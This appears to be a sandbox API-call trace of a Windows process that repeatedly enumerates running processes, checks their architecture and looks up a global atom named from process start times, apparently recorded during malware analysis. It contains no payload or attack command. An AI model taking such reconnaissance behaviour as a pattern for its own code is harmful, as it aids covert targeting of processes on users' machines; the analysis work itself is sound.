	[0105.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.733] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.733] CloseHandle (hObject=0x694) returned 1
	[0105.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.733] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.733] CloseHandle (hObject=0x694) returned 1
	[0105.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.733] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.733] CloseHandle (hObject=0x694) returned 1
	[0105.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.733] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.733] CloseHandle (hObject=0x694) returned 1
	[0105.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.734] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.734] CloseHandle (hObject=0x694) returned 1
	[0105.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.734] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.734] CloseHandle (hObject=0x694) returned 1
	[0105.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.734] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.734] CloseHandle (hObject=0x694) returned 1
	[0105.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.734] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.734] CloseHandle (hObject=0x694) returned 1
	[0105.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.734] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.735] CloseHandle (hObject=0x694) returned 1
	[0105.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.735] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.735] CloseHandle (hObject=0x694) returned 1
	[0105.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.735] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.735] CloseHandle (hObject=0x694) returned 1
	[0105.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.735] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.735] CloseHandle (hObject=0x694) returned 1
	[0105.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.735] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.735] CloseHandle (hObject=0x694) returned 1
	[0105.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.735] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.735] CloseHandle (hObject=0x694) returned 1
	[0105.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.736] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.736] CloseHandle (hObject=0x694) returned 1
	[0105.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.736] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.736] CloseHandle (hObject=0x694) returned 1
	[0105.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.736] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.736] CloseHandle (hObject=0x694) returned 1
	[0105.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.736] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.736] CloseHandle (hObject=0x694) returned 1
	[0105.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.737] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.737] CloseHandle (hObject=0x694) returned 1
	[0105.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.737] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.737] CloseHandle (hObject=0x694) returned 1
	[0105.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.737] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.737] CloseHandle (hObject=0x694) returned 1
	[0105.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.737] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.737] CloseHandle (hObject=0x694) returned 1
	[0105.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.737] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.737] CloseHandle (hObject=0x694) returned 1
	[0105.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.737] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.738] CloseHandle (hObject=0x694) returned 1
	[0105.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.738] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.740] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.740] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.741] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.741] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.741] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.741] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.741] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.741] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.741] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.742] CloseHandle (hObject=0x694) returned 1
	[0105.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.742] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.742] CloseHandle (hObject=0x694) returned 1
	[0105.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.742] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.742] CloseHandle (hObject=0x694) returned 1
	[0105.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.742] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.742] CloseHandle (hObject=0x694) returned 1
	[0105.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.781] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.781] CloseHandle (hObject=0x694) returned 1
	[0105.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.781] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.781] CloseHandle (hObject=0x694) returned 1
	[0105.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.781] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.781] CloseHandle (hObject=0x694) returned 1
	[0105.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.782] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.782] CloseHandle (hObject=0x694) returned 1
	[0105.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.782] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.782] CloseHandle (hObject=0x694) returned 1
	[0105.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.782] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.782] CloseHandle (hObject=0x694) returned 1
	[0105.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.782] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.782] CloseHandle (hObject=0x694) returned 1
	[0105.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.782] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.782] CloseHandle (hObject=0x694) returned 1
	[0105.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.783] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.783] CloseHandle (hObject=0x694) returned 1
	[0105.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.783] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.783] CloseHandle (hObject=0x694) returned 1
	[0105.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.783] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.783] CloseHandle (hObject=0x694) returned 1
	[0105.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.783] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.783] CloseHandle (hObject=0x694) returned 1
	[0105.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.784] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.784] CloseHandle (hObject=0x694) returned 1
	[0105.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.784] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.784] CloseHandle (hObject=0x694) returned 1
	[0105.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.784] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.784] CloseHandle (hObject=0x694) returned 1
	[0105.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.784] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.784] CloseHandle (hObject=0x694) returned 1
	[0105.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.785] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.785] CloseHandle (hObject=0x694) returned 1
	[0105.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.785] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.785] CloseHandle (hObject=0x694) returned 1
	[0105.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.785] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.785] CloseHandle (hObject=0x694) returned 1
	[0105.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.785] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.785] CloseHandle (hObject=0x694) returned 1
	[0105.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.786] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.786] CloseHandle (hObject=0x694) returned 1
	[0105.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.786] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.786] CloseHandle (hObject=0x694) returned 1
	[0105.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.786] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.786] CloseHandle (hObject=0x694) returned 1
	[0105.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.786] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.786] CloseHandle (hObject=0x694) returned 1
	[0105.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.787] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.787] CloseHandle (hObject=0x694) returned 1
	[0105.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.787] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.787] CloseHandle (hObject=0x694) returned 1
	[0105.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.787] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.787] CloseHandle (hObject=0x694) returned 1
	[0105.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.787] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.787] CloseHandle (hObject=0x694) returned 1
	[0105.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.787] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.788] CloseHandle (hObject=0x694) returned 1
	[0105.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.788] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.788] CloseHandle (hObject=0x694) returned 1
	[0105.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.788] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.788] CloseHandle (hObject=0x694) returned 1
	[0105.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.788] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.789] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.789] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.789] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.789] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.792] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.792] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.792] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.792] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.792] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.792] CloseHandle (hObject=0x694) returned 1
	[0105.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.793] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.793] CloseHandle (hObject=0x694) returned 1
	[0105.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.793] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.793] CloseHandle (hObject=0x694) returned 1
	[0105.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.793] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.793] CloseHandle (hObject=0x694) returned 1
	[0105.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.835] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.835] CloseHandle (hObject=0x694) returned 1
	[0105.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.835] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.835] CloseHandle (hObject=0x694) returned 1
	[0105.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.835] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.835] CloseHandle (hObject=0x694) returned 1
	[0105.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.836] CloseHandle (hObject=0x694) returned 1
	[0105.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.836] CloseHandle (hObject=0x694) returned 1
	[0105.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.836] CloseHandle (hObject=0x694) returned 1
	[0105.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.836] CloseHandle (hObject=0x694) returned 1
	[0105.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.836] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.836] CloseHandle (hObject=0x694) returned 1
	[0105.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.837] CloseHandle (hObject=0x694) returned 1
	[0105.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.837] CloseHandle (hObject=0x694) returned 1
	[0105.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.837] CloseHandle (hObject=0x694) returned 1
	[0105.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.837] CloseHandle (hObject=0x694) returned 1
	[0105.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.837] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.837] CloseHandle (hObject=0x694) returned 1
	[0105.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.838] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.838] CloseHandle (hObject=0x694) returned 1
